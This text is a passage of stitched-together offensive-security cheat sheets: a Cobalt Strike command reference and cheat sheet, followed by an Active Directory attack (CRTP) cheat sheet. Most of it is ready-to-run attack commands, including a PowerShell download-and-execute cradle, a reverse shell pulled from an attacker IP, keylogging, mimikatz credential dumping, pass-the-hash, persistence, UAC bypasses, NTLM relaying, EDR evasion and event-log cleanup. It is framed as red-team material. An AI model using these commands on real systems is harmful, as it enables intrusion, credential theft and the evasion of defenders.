remote-exec [method] [target] [command]
```
- **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts. It gives you basic ssh functionality with some additional post exploitation modules.
## Exflitration
- **hashdump:** Dump the local SAM hive's NTLM hashes. This only dumps local machine user credentials.
- **keylogger:** Will capture keystrokes of a specified process and save them on a database.
- **keylogger Usage:**
```
keylogger [pid] [x86|x64]
```
i.e.
```
keylogger 8932 x64
keylogger
...
```
This command can also be used without specifying arguments to spawn a temporary process and inject the keystroke logger into it.
- **screenshot:** Will capture the screen of a current process and save it on the database.
- **screenshot Usage:**
```
screenshot [pid] [x86|x64] [run time in seconds]
```
i.e.
```
screenshot 1042 x64 15
screenshot 773 x86 5
```
- **logonpassword:** Executes the well know **logonpasswords** function of mimikatz on the current machine. This function of course uses process injection so isn't OPSEC safe, use it with precaution.
- **mimikatz:** You can execute any function of mimikatz, mimikatz driver functionality is not included.
## Miscellaneous
- **spawn:** Spawn a new beacon on the current machine, you can choose any type of listener you want.
- **spawn Usage:**
```
spawn [x86|x64] [listener]
```
i.e.
```
spawn x64 Lab-HTTPS
spawn x86 Lab-SMB
...
```
- **spawnas:** Spawn a new beacon on the current machine as another user by providing credentials.
- **spawnas Usage:**
```
spawnas [DOMAIN\user] [password] [listener]
```
i.e.
```
spawnas CORP\bob.smith baseBall1942 Lab-SMB
spawnas Administrator SuperS3cRetPaSsw0rD Lab-HTTPS
...
```
- **spawnto:** Sets the executable that beacon will use to spawn and inject shellcode into it for it's post-exploitation functionality. You must specify a full path to the executable.
```
spawnto [x86|x64] [c:\path\to\whatever.exe]
```
i.e.
```
spawnto x64 c:\programdata\beacon.exe
spawnto x86 c:\users\S1ckB0y1337\NotMalware\s1ck.exe
```
- **spawnu:** Attempt to spawn a session with a spoofer PID as its parent, the context of the process will match the identity of the specified PID.
```
spawnu [pid] [listener]
```
i.e.
```
spawnu 812 Lab-SMB
spawnu 9531 Lab-DNS
...
```
- **argue:** Will mask/spoof the arguments of a malicious command of our choice with legitimate ones.
- **blockdlls:** This module will create and set a custom policy on beacon's child processes that will block the injection of any 3rd party dll that is not signed by microsoft, that way we can block any blue team tool that uses dll injection to inspect and kill malicious processes and actions.
- **blockdlls Usage:**
```
blockdlls [start|stop]
```
- **timestomp:** Tamper the timestamp of a file, by applying another file's timestamp.
- **timestomp Usage:**
```
timestomp [fileA] [fileB]
```
i.e.
```
timestomp C:\Users\S1ckB0y1337\Desktop\logins.xlsx C:\Users\S1ckB0y1337\Desktop\notmalicious.xlsx
```
## OPSEC Notes
- **Session Prepping:** Before engaging in any post-exploitation action after we have compromised a host, we should prepare our beacon to match the environments behaviour, that way we will generate the less amount of IOCs (Indicators Of Compromise) we can. To do that we can the "spawnto" module to specify which binary our child processes will use to execute post exploitation actions, also we can use the "ppid" module to spoof the parent process that our child processes will spawn under. Both those tricks will provide us with a good amount of stealth and will hide our presence on the compromised host.
- **Environment Behaviour Blending:** On a post exploitation context even when we are using the http(s) protocols to blend in with the environment's traffic, a good endpoint security solution or a Next Generation firewall can figure out that some traffic is unusual to exist on this environment and will probably block and create telemetry to a SOC endpoint for the blue team to examine it. Thats where "Malleable C2" profiles come, it is a configuration file that each cobalt strike team server can use and it provides customization and flexibility for: beacon's traffic, process injection, process spawning, behaviour, antivirus evasion etc. So the best practise is to never use default beacon behaviour and always use a custom profile for every assessment.
## EDR Evasion Tools and Methods
- [PEzor](https://github.com/phra/PEzor): PE Packer for EDR evasion.
- [SharpBlock](https://github.com/CCob/SharpBlock): A method of bypassing EDR's active projection DLL's by preventing entry point execution.
- [TikiTorch](https://github.com/rasta-mouse/TikiTorch): AV/EDR evasion using Process Hollowing Injection.
- [Donut](https://github.com/TheWover/donut): Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies.
- [Dynamic-Invoke](https://thewover.github.io/Dynamic-Invoke/): Bypassing EDR solution by hiding malicious win32 API calls from within C# managed code.
## General Post-Exploitation TIPS
- Before executing anything be sure you know how it behaves and what IOCs (Indicators Of Compromise) it generates.
- Try to not touch disk as much as you can and operate in memory for the most part.
- Check AppLocker policies to determine what type of files you can execute and from which locations.
- Clean up artifacts immediately after finishing a post-exploitation task.
- Clean event logs after finishing with a host.
# Cobalt-Strike-Cheat-Sheet
## Cobalt Strike
> Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful graphical user interface that encourages collaboration and reports all activity.
```powershell
$ sudo apt-get update
$ sudo apt-get install openjdk-11-jdk
$ sudo apt install proxychains socat
$ sudo update-java-alternatives -s java-1.11.0-openjdk-amd64
$ sudo ./teamserver 10.10.10.10 "password" [malleable C2 profile]
$ ./cobaltstrike
$ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))"
```
## Summary
* [Infrastructure](#infrastructure)
* [Redirectors](#redirectors)
* [Domain fronting](#domain-fronting)
* [OpSec](#opsec)
* [Customer ID](#customer-id)
* [Payloads](#payloads)
* [DNS Beacon](#dns-beacon)
* [SMB Beacon](#smb-beacon)
* [Metasploit compatibility](#metasploit-compatibility)
* [Custom Payloads](#custom-payloads)
* [Malleable C2](#malleable-c2)
* [Files](#files)
* [Powershell and .NET](#powershell-and-net)
* [Powershell commabds](#powershell-commands)
* [.NET remote execution](#net-remote-execution)
* [Lateral Movement](#lateral-movement)
* [VPN & Pivots](#vpn--pivots)
* [Kits](#kits)
* [Elevate Kit](#elevate-kit)
* [Persistence Kit](#persistence-kit)
* [Resource Kit](#resource-kit)
* [Artifact Kit](#artifact-kit)
* [Mimikatz Kit](#mimikatz-kit)
* [Beacon Object Files](#beacon-object-files)
* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
* [References](#references)
## Infrastructure
### Redirectors
```powershell
sudo apt install socat
socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80
```
### Domain Fronting
* New Listener > HTTP Host Header
* Choose a domain in "Finance & Healthcare" sector
## OpSec
**Don't**
* Use default self-signed HTTPS certificate
* Use default port (50050)
* Use 0.0.0.0 DNS response
* Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D`
**Do**
* Use a redirector (Apache, CDN, ...)
* Firewall to only accept HTTP/S from the redirectors
* Firewall 50050 and access via SSH tunnel
* Edit default HTTP 404 page and Content type: text/plain
* No staging `set hosts_stage` to `false` in Malleable C2
* Use Malleable Profile to taylor your attack to specific actors
### Customer ID
> The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike.
* The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later.
* The trial has a Customer ID value of 0.
* Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool
## Payloads
### DNS Beacon
* Edit the Zone File for the domain
* Create an A record for Cobalt Strike system
* Create an NS record that points to FQDN of your Cobalt Strike system
Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a DNS A record and point it to your Cobalt Strike team server. Use DNS NS records to delegate several domains or sub-domains to your Cobalt Strike team server's A record.
* nslookup jibberish.beacon polling.campaigns.domain.com
* nslookup jibberish.beacon campaigns.domain.com
Example of DNS on Digital Ocean:
```powershell
NS example.com directs to 10.10.10.10. 86400
NS polling.campaigns.example.com directs to campaigns.example.com. 3600
A campaigns.example.com directs to 10.10.10.10 3600
```
```powershell
systemctl disable systemd-resolved
systemctl stop systemd-resolved
rm /etc/resolv.conf
echo "nameserver 8.8.8.8" > /etc/resolv.conf
echo "nameserver 8.8.4.4" >> /etc/resolv.conf
```
Configuration:
1. **host**: campaigns.domain.com
2. **beacon**: polling.campaigns.domain.com
3. Interact with a beacon, and `sleep 0`
### SMB Beacon
```powershell
link [host] [pipename]
connect [host] [port]
unlink [host] [PID]
jump [exec] [host] [pipe]
```
SMB Beacon uses Named Pipes. You might encounter these error code while running it.
| Error Code | Meaning | Description |
|------------|----------------------|----------------------------------------------------|
| 2 | File Not Found | There is no beacon for you to link to |
| 5 | Access is denied | Invalid credentials or you don't have permission |
| 53 | Bad Netpath | You have no trust relationship with the target system. It may or may not be a beacon there. |
### SSH Beacon
```powershell
# deploy a beacon
beacon> help ssh
Use: ssh [target:port] [user] [pass]
Spawn an SSH client and attempt to login to the specified target
beacon> help ssh-key
Use: ssh [target:port] [user] [/path/to/key.pem]
Spawn an SSH client and attempt to login to the specified target
# beacon's commands
upload Upload a file
download Download a file
socks Start SOCKS4a server to relay traffic
sudo Run a command via sudo
rportfwd Setup a reverse port forward
shell Execute a command via the shell
```
### Metasploit compatibility
* Payload: windows/meterpreter/reverse_http or windows/meterpreter/reverse_https
* Set LHOST and LPORT to the beacon
* Set DisablePayloadHandler to True
* Set PrependMigrate to True
* exploit -j
### Custom Payloads
https://ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c
```powershell
* Attacks > Packages > Payload Generator
* Attacks > Packages > Scripted Web Delivery (S)
$ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor
$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml
$ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml
```
## Malleable C2
List of Malleable Profiles hosted on Github
* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles
* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2
* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles
* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint
Example of syntax
```powershell
set useragent "SOME AGENT"; # GOOD
set useragent 'SOME AGENT'; # BAD
prepend "This is an example;";
# Escape Double quotes
append "here is \"some\" stuff";
# Escape Backslashes
append "more \\ stuff";
# Some special characters do not need escaping
prepend "!@#$%^&*()";
```
Check a profile with `./c2lint`.
* A result of 0 is returned if c2lint completes with no errors
* A result of 1 is returned if c2lint completes with only warnings
* A result of 2 is returned if c2lint completes with only errors
* A result of 3 is returned if c2lint completes with both errors and warning
## Files
```powershell
# List the file on the specified directory
beacon > ls <C:\Path>
# Change into the specified working directory
beacon > cd [directory]
# Delete a file\folder
beacon > rm [file\folder]
# File copy
beacon > cp [src] [dest]
# Download a file from the path on the Beacon host
beacon > download [C:\filePath]
# Lists downloads in progress
beacon > downloads
# Cancel a download currently in progress
beacon > cancel [*file*]
# Upload a file from the attacker to the current Beacon host
beacon > upload [/path/to/file]
```
## Powershell and .NET
### Powershell commands
```powershell
# Import a Powershell .ps1 script from the control server and save it in memory in Beacon
beacon > powershell-import [/path/to/script.ps1]
# Setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned.
beacon > powershell [commandlet][arguments]
# Launch the given function using Unmanaged Powershell, which does not start powershell.exe. The program used is set by spawnto
beacon > powerpick [commandlet] [argument]
# Inject Unmanaged Powershell into a specific process and execute the specified command. This is useful for long-running Powershell jobs
beacon > psinject [pid][arch] [commandlet] [arguments]
```
### .NET remote execution
Run a local .NET executable as a Beacon post-exploitation job.
Require:
* Binaries compiled with the "Any CPU" configuration.
```powershell
beacon > execute-assembly [/path/to/script.exe] [arguments]
beacon > execute-assembly /home/audit/Rubeus.exe
[*] Tasked beacon to run .NET program: Rubeus.exe
[+] host called home, sent: 318507 bytes
[+] received output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.4.2
```
## Lateral Movement
:warning: OPSEC Advice: Use the **spawnto** command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe
- **portscan:** Performs a portscan on a spesific target.
- **runas:** A wrapper of runas.exe, using credentials you can run a command as another user.
- **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \
:exclamation: This module needs Administrator privileges.
- **steal_token:** Steal a token from a specified process.
- **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.
- **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \
:exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \
:muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network.
- **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \
:exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target.
- **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts.
:warning: All the commands launch powershell.exe
```powershell
Beacon Remote Exploits
======================
jump [module] [target] [listener]
psexec x86 Use a service to run a Service EXE artifact
psexec64 x64 Use a service to run a Service EXE artifact
psexec_psh x86 Use a service to run a PowerShell one-liner
winrm x86 Run a PowerShell script via WinRM
winrm64 x64 Run a PowerShell script via WinRM
Beacon Remote Execute Methods
=============================
remote-exec [module] [target] [command]
Methods Description
------- -----------
psexec Remote execute via Service Control Manager
winrm Remote execute via WinRM (PowerShell)
wmi Remote execute via WMI (PowerShell)
```
Opsec safe Pass-the-Hash:
1. `mimikatz sekurlsa::pth /user:xxx /domain:xxx /ntlm:xxxx /run:"powershell -w hidden"`
2. `steal_token PID`
### Assume Control of Artifact
* Use `link` to connect to SMB Beacon
* Use `connect` to connect to TCP Beacon
## VPN & Pivots
:warning: Covert VPN doesn't work with W10, and requires Administrator access to deploy.
> Use socks 8080 to setup a SOCKS4a proxy server on port 8080 (or any other port you choose). This will setup a SOCKS proxy server to tunnel traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it. Use sleep 0 to make Beacon check-in several times a second.
```powershell
# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
beacon > socks [PORT]
# Proxy browser traffic through a specified Internet Explorer process.
beacon > browserpivot [pid] [x86|x64]
# Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port.
beacon > rportfwd [bind port] [forward host] [forward port]
# spunnel : Spawn an agent and create a reverse port forward tunnel to its controller. ~= rportfwd + shspawn.
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin
beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin
# spunnel_local: Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller
# then you can handle the connect back on your MSF multi handler
beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin
```
## Kits
* [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/) - Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike
### Elevate Kit
UAC Token Duplication : Fixed in Windows 10 Red Stone 5 (October 2018)
```powershell
beacon> runasadmin
Beacon Command Elevators
========================
Exploit Description
------- -----------
ms14-058 TrackPopupMenu Win32k NULL Pointer Dereference (CVE-2014-4113)
ms15-051 Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)
ms16-016 mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)
svc-exe Get SYSTEM via an executable run as a service
uac-schtasks Bypass UAC with schtasks.exe (via SilentCleanup)
uac-token-duplication Bypass UAC with Token Duplication
```
### Persistence Kit
* https://github.com/0xthirteen/MoveKit
* https://github.com/fireeye/SharPersist
```powershell
# List persistences
SharPersist -t schtaskbackdoor -m list
SharPersist -t startupfolder -m list
SharPersist -t schtask -m list
# Add a persistence
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
SharPersist -t schtaskbackdoor -n "Something Cool" -m remove
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
SharPersist -t service -n "Some Service" -m remove
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
SharPersist -t schtask -n "Some Task" -m remove
```
### Resource Kit
> The Resource Kit is Cobalt Strike's means to change the HTA, PowerShell, Python, VBA, and VBS script templates Cobalt Strike uses in its workflows
### Artifact Kit
> Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. The Artifact Kit build script creates a folder with template artifacts for each Artifact Kit technique. To use a technique with Cobalt Strike, go to Cobalt Strike -> Script Manager, and load the artifact.cna script from that technique's folder.
Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
- Download the artifact kit : `Go to Help -> Arsenal to download Artifact Kit (requires a licensed version of Cobalt Strike)`
- Install the dependencies : `sudo apt-get install mingw-w64`
- Edit the Artifact code
* Change pipename strings
* Change `VirtualAlloc` in `patch.c`/`patch.exe`, e.g: HeapAlloc
* Change Import
- Build the Artifact
- Cobalt Strike -> Script Manager > Load .cna
### Mimikatz Kit
* Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724)
* Load the mimikatz.cna aggressor script
* Use mimikatz functions as normal
### Sleep Mask Kit
> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping.
Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons.
## Beacon Object Files
> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs
Example: https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h
* Compile
```ps1
# To compile this with Visual Studio:
cl.exe /c /GS- hello.c /Fohello.o
# To compile this with x86 MinGW:
i686-w64-mingw32-gcc -c hello.c -o hello.o
# To compile this with x64 MinGW:
x86_64-w64-mingw32-gcc -c hello.c -o hello.o
```
* Execute: `inline-execute /path/to/hello.o`
## NTLM Relaying via Cobalt Strike
```powershell
beacon> socks 1080
kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://<IP_TARGET>
beacon> rportfwd_local 8445 <IP_KALI> 445
beacon> upload C:\Tools\PortBender\WinDivert64.sys
beacon> PortBender redirect 445 8445
```
## References
* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI)
* [Red Team Ops with Cobalt Strike (2 of 9): Infrastructure](https://www.youtube.com/watch?v=5gwEMocFkc0)
* [Red Team Ops with Cobalt Strike (3 of 9): C2](https://www.youtube.com/watch?v=Z8n9bIPAIao)
* [Red Team Ops with Cobalt Strike (4 of 9): Weaponization](https://www.youtube.com/watch?v=H0_CKdwbMRk)
* [Red Team Ops with Cobalt Strike (5 of 9): Initial Access](https://www.youtube.com/watch?v=bYt85zm4YT8)
* [Red Team Ops with Cobalt Strike (6 of 9): Post Exploitation](https://www.youtube.com/watch?v=Pb6yvcB2aYw)
* [Red Team Ops with Cobalt Strike (7 of 9): Privilege Escalation](https://www.youtube.com/watch?v=lzwwVwmG0io)
* [Red Team Ops with Cobalt Strike (8 of 9): Lateral Movement](https://www.youtube.com/watch?v=QF_6zFLmLn0)
* [Red Team Ops with Cobalt Strike (9 of 9): Pivoting](https://www.youtube.com/watch?v=sP1HgUu7duU&list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no&index=10&t=0s)
* [A Deep Dive into Cobalt Strike Malleable C2 - Joe Vest - Sep 5, 2018 ](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b)
* [Cobalt Strike. Walkthrough for Red Teamers - Neil Lines - 15 Apr 2019](https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/)
* [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/)
* [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon)
* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm)
* [Cobalt Strike 4.5 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf)
# CRTP-cheatsheet
# Summary
* [General](#General)
* [Domain Enumeration](#Domain-Enumeration)
* [Powerview Domain](#Powerview-Domain)
* [Powerview Users, groups and computers](#Powerview-users-groups-and-computers)
* [Powerview Shares](#Powerview-shares)
* [Powerview GPO](#Powerview-GPO)
* [Powerview ACL](#Powerview-ACL)
* [Powerview Domain Trust](#Powerview-Domain-Trust)
* [Misc](#misc)
* [Local privilege escalation](#Local-privilege-escalation)
* [Lateral Movement](#Lateral-Movement)
* [General](#General)
* [Mimikatz](#Mimikatz)
* [Domain Persistence](#Domain-Persistence)
* [Golden Ticket](#Golden-Ticket)
* [Silver Ticket](#Silver-Ticket)
* [Skeleton Key](#Skeleton-Key)
* [DSRM](#DSRM)
* [Custom SSP - Track logons](#Custom-SSP---Track-logons)
* [ACL](#ACL)
* [AdminSDHolder](#AdminSDHolder)
* [DCsync](#DCsync)
* [SecurityDescriptor - WMI](#SecurityDescriptor---WMI)
* [SecurityDescriptor - Powershell Remoting](#SecurityDescriptor---Powershell-Remoting)
* [SecurityDescriptor - Remote Registry](#SecurityDescriptor---Remote-Registry)
* [Domain privilege escalation](#Domain-privilege-escalation)
* [Kerberoast](#Kerberoast)
* [AS-REPS Roasting](#AS-REPS-Roasting)
* [Set SPN](#Set-SPN)
* [Unconstrained Delegation](#Unconstrained-delegation)
* [Constrained Delegation](#Constrained-delegation)
* [DNS Admins](#DNS-Admins)
* [Enterprise Admins](#Enterprise-Admins)
* [Child to parent - Trust tickets](#Child-to-parent---Trust-tickets)
* [Child to parent - krbtgt hash](#Child-to-parent---krbtgt-hash)
* [Crossforest attacks](#Crossforest-attacks)
* [Trust flow](#Trust-flow)
* [Trust abuse SQL](#Trust-abuse-SQL)
# General
#### Access C disk of a computer (check local admin)
```
ls \\<computername>\c$
```
#### Use this parameter to not print errors powershell
```
-ErrorAction SilentlyContinue
```
#### Rename powershell windows
```
$host.ui.RawUI.WindowTitle = "<naam>"
```
#### Impacket PSexec impacket
If no LM Hash use an empty one: ```aad3b435b51404eeaad3b435b51404ee```
```
python3 psexec.py -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME>@<TARGET>
python3 psexec.py <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>
```
# Domain Enumeration
## Powerview Domain
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
```
. ./PowerView.ps1
```
#### Get current domain
```
Get-NetDomain
```
#### Get object of another domain
```
Get-NetDomain -Domain <domainname>
```
#### Get Domain SID for the current domain
```
Get-DomainSID
```
#### Get the domain password policy
```
Get-DomainPolicy
(Get-DomainPolicy)."System Access"
net accounts
```
## Powerview users groups and computers
#### Get Information of domain controller
```
Get-NetDomainController
Get-NetDomainController | select-object Name
```
#### Get information of users in the domain
```
Get-NetUser
Get-NetUser -Username <username>
```
#### Get list of all users
```
Get-NetUser | select samaccountname
```
#### Get list of usernames, last logon and password last set
```
Get-NetUser | select samaccountname, lastlogon, pwdlastset
Get-NetUser | select samaccountname, lastlogon, pwdlastset | Sort-Object -Property lastlogon
```
#### Get list of usernames and their groups
```
Get-NetUser | select samaccountname, memberof
```
#### Get list of all properties for users in the current domain
```
get-userproperty -Properties pwdlastset
```
#### Get descripton field from the user
```
Find-UserField -SearchField Description -SearchTerm "built"
Get-netuser | Select-Object samaccountname,description
```
#### Get computer information
```
Get-NetComputer
Get-NetComputer -FullData
Get-NetComputer -Computername <computername> -FullData
```
#### Get computers with operating system ""
```
Get-NetComputer -OperatingSystem "*Server 2016*"
```
#### Get list of all computer names and operating systems
```
Get-NetComputer -fulldata | select samaccountname, operatingsystem, operatingsystemversion
```
#### List all groups of the domain
```
Get-NetGroup
Get-NetGroup -GroupName *admin*
Get-NetGroup -Domain <domain>
```
#### Get all the members of the group
```
Get-NetGroupMember -Groupname "Domain Admins" -Recurse
Get-NetGroupMember -Groupname "Domain Admins" -Recurse | select MemberName
```
#### Get the group membership of a user
```
Get-NetGroup -Username <username>
```
#### List all the local groups on a machine (needs admin privs on non dc machines)
```
Get-NetlocalGroup -Computername <computername> -ListGroups
```
#### Get Member of all the local groups on a machine (needs admin privs on non dc machines)
```
Get-NetlocalGroup -Computername <computername> -Recurse
```
#### Get actively logged users on a computer (needs local admin privs)
```
Get-NetLoggedon -Computername <computername>
```
#### Get locally logged users on a computer (needs remote registry rights on the target)
```
Get-LoggedonLocal -Computername <computername>
```
#### Get the last logged users on a computer (needs admin rights and remote registary on the target)
```
Get-LastLoggedOn -ComputerName <computername>
```
## Powerview shares
#### Find shared on hosts in the current domain
```
Invoke-ShareFinder -Verbose
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC
```
#### Find sensitive files on computers in the domain
```
Invoke-FileFinder -Verbose
```
#### Get all fileservers of the domain
```
Get-NetFileServer
```
## Powerview GPO
#### Get list of GPO's in the current domain
```
Get-NetGPO
Get-NetGPO -Computername <computername>
```
#### Get GPO's which uses restricteds groups or groups.xml for interesting users
```
Get-NetGPOGroup
```
#### Get users which are in a local group of a machine using GPO
```
Find-GPOComputerAdmin -Computername <computername>
```
#### Get machines where the given user is member of a specific group
```
Find-GPOLocation -Username student244 -Verbose
```
#### Get OU's in a domain
```
Get-NetOU -Fulldata
```
#### Get machines that are part of an OU
```
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_}
```
#### Get GPO applied on an OU
gplink from Get-NetOU -Fulldata
```
Get-NetGPO -GPOname "{<gplink>}"
```
## Powerview ACL
#### Get the ACL's associated with the specified object
```
Get-ObjectACL -SamAccountName <accountname> -ResolveGUIDS
```
#### Get the ACL's associated with the specified prefix to be used for search
```
Get-ObjectACL -ADSprefix ‘CN=Administrator,CN=Users’ -Verbose
```
#### Get the ACL's associated with the specified path
```
Get-PathAcl -Path \\<Domain controller>\sysvol
```
#### Search for interesting ACL's
```
Invoke-ACLScanner -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl
```
#### Search of interesting ACL's for the current user
```
Invoke-ACLScanner | Where-Object {$_.IdentityReference –eq [System.Security.Principal.WindowsIdentity]::GetCurrent().Name}
```
## Powerview Domain trust
#### Get a list of all the domain trusts for the current domain
```
Get-NetDomainTrust
```
#### Get details about the forest
```
Get-NetForest
```
#### Get all domains in the forest
```
Get-NetForestDomain
Get-NetforestDomain -Forest <domain name>
```
#### Get global catalogs for the current forest
```
Get-NetForestCatalog
Get-NetForestCatalog -Forest <domain name>
```
#### Map trusts of a forest
```
Get-NetForestTrust
Get-NetForestTrust -Forest <domain name>
Get-NetForestDomain -Verbose | Get-NetDomainTrust
```
## Misc
#### Powerview Find all machines on the current domain where the current user has local admin access
```
Find-LocalAdminAccess -Verbose
```
```
. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess
```
```
. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
```
#### Powerview Find local admins on all machines of the domain (needs admin privs)
```
Invoke-EnumerateLocalAdmin -Verbose
```
#### Connect to machine with administrator privs
```
Enter-PSSession -Computername <computername>
```
#### Save and use sessions of a machine
```
$sess = New-PSSession -Computername <computername>
Enter-PSSession $sess
```
#### Find active sessions
```
Invoke-UserHunter
Invoke-UserHunter -Groupname "RDPUsers"
```
#### Find active sessions of domain admins
```
Invoke-UserHunter -Groupname "Domain Admins"
```
#### check access to machine
```
Invoke-UserHunter -CheckAccess
```
#### BloodHound
https://github.com/BloodHoundAD/BloodHound
```
cd Ingestors
. ./sharphound.ps1
Invoke-Bloodhound -CollectionMethod all -Verbose
Invoke-Bloodhound -CollectionMethod LoggedOn -Verbose
#Copy neo4j-community-3.5.1 to C:\
#Open cmd
cd C:\neo4j\neo4j-community-3.5.1-windows\bin
neo4j.bat install-service
neo4j.bat start
#Browse to BloodHound-win32-x64
Run BloodHound.exe
#Change credentials and login
```
#### Powershell reverse shell
```
Powershell.exe iex (iwr http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1 -UseBasicParsing);reverse -Reverse -IPAddress xx.xx.xx.xx -Port 4000
```
# Local privilege escalation
Focussing on Service issues
#### Privesc check all
https://github.com/enjoiz/Privesc
```
. .\privesc.ps1
Invoke-PrivEsc
```
#### Beroot check all
https://github.com/AlessandroZ/BeRoot
```
./beRoot.exe
```
#### Run powerup check all
https://github.com/HarmJ0y/PowerUp
```
. ./powerup
Invoke-allchecks
```
#### Run powerup get services with unqouted paths and a space in their name
```
Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose
```
#### Abuse service to get local admin permissions with powerup
```
Invoke-ServiceAbuse
